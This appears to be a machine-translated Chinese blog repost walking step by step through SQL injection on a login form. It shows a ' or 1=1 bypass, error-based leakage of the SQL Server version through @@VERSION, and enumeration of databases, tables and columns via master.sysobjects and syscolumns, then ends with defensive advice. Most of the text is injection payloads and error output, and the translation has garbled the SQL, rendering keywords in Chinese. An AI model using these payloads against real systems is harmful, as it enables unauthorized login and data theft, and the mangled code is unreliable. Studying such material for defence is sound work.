这篇文章会详细说明SQL注入的整个过程是如何深入分析的,文章的内容也是高质量的,所以边肖会分享给大家参考。希望你看完这篇文章后有所了解。
SQL注入的整个过程分析如下:
初步注入--绕过验证,直接登录
公司网站登陆框如下:
可以看到,除了账号密码,还有一个公司名称输入框。根据输入框的形式,不难介绍SQL的编写如下:复制代码代码如下:
从表中选择*其中名称='XX '和密码='YY '和公司='ZZ '
发现前两个勾选了,第三个输入框忽略了。这就是漏洞!开始注射,并在输入框中输入以下内容:
用户名留空,密码留空。在这种情况下,单击登录按钮后,您实际上已成功登录。
让我们看看最终的SQL,找出原因:复制代码如下:
从表中选择*其中名称='SQL inject '和密码='和Corp='或1=1 -'
从代码中可以看出,单引号前半部分关闭,后半部分单引号用“-”注释掉,中间有一个永久条件“1=1”,导致任何字符都可以成功登录。然而,Sql注入的危害不仅仅是匿名登录。
中级注入--借助异常获取信息
现在我们在第三个输入框中写道:
Or1=(选择@@@版本)如下所示:
后台的SQL变成这样:
选择* fromtablewhenname=' sqlinobject '和password=' and corp=' ' or 1=(SELECT @@VERSION)-'判断条件改为1=(SELECT @ @ VERSION),
这样写肯定会导致错误,但错误正是我们想要的。单击登录后,页面上会显示以下信息:
将nvarchar值“Microsoft SQL Server 2008(SP3)-10 . 0 . 5500 . 0(X64)2011年9月21日22:45:45版权所有(c)1988-2008 Microsoft Corporation Developer Edition(64位)在Windows NT 6.1 X64上(构建7601: Service Pack 1)”转换为数据类型int时转换失败。
可怕的事情发生了,服务器的操作系统和SQL Server版本信息实际上是通过错误显示的。
危害扩大--获取服务器所有的库名、表名、字段名
然后,我们在输入框中输入以下信息:复制代码如下:
t '或1=(从主列表中选择前1名.名称不在的系统数据库(从主数据库中选择前0名.sysdatabases)) -
这时发现第三个输入框有字长的限制,但是客户端的这个限制是没有用的。
可以通过谷歌浏览器直接移除。
点击登录,返回信息如下:
将nvarchar值“master”转换为数据类型int时转换失败。
数据库名“master”异常显示!依次更改上面SQL语句中的序列号,
您可以获得服务器上所有数据库的名称。
接下来,输入信息如下:复制代码代码如下:
' b '或1=(从主列表中选择前1名.其中xtype='U '且名称不在(SELECT FROM master前1名.sysobjects,其中xtype=' U ')-
返回的信息如下:
将nvarchar值“spt_fallback_db”转换为数据类型int时转换失败。
我们得到了主数据库中的第一个表名:“spt_fallback_db”,
同上,依次更改序号,就可以得到这个库的所有表名。
现在让我们以“spt_fallback_db”表为例,尝试获取表中的所有字段名。在输入框中输入以下代码:复制代码代码如下:
' b '或1=(SELECT top 1主.syscolumns.name FROM master.主系统列.sysobjects WHERE主服务器.syscolumns.id=master.sysobjects.id和master.sysobjects . name=' SPT _ fallback _ db ');
因此,错误消息如下:
将nvarchar值“xserver_name”转换为数据类型int时转换失败。
这样,第一个字段名“xserver_name”就出来了。通过依次更改序列号,可以遍历所有字段名称。
最终目的--获取数据库中的数据
在这一点上,我们知道所有的数据库、表格和字段都可以通过SQL注入获得。为了防止本文成为注入教程,不再描述获取数据的代码,本文的目的已经达到。SQL注入是什么意思?这意味着数据库中的所有数据都可能被窃取。
知道这种危害后,还有人能忽视SQL注入的脆弱性吗?
结语
关于安全,总结以下几点:
1.时刻警惕用户输入的内容。
2.只有客户端的身份验证等于没有身份验证。
3.不要向用户公开服务器错误信息。
另外,我想补充几点:SQL注入不仅可以通过输入框实现,还可以通过网址实现。
2.除了服务器错误页面,还有其他获取数据库信息的方法。
3.注入行为可以用软件模拟,窃取信息的速度比你想象的要快得多。
4.漏洞与语言平台无关。
我希望在这里分享对SQL注入整个过程的深入分析。
内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/127863.html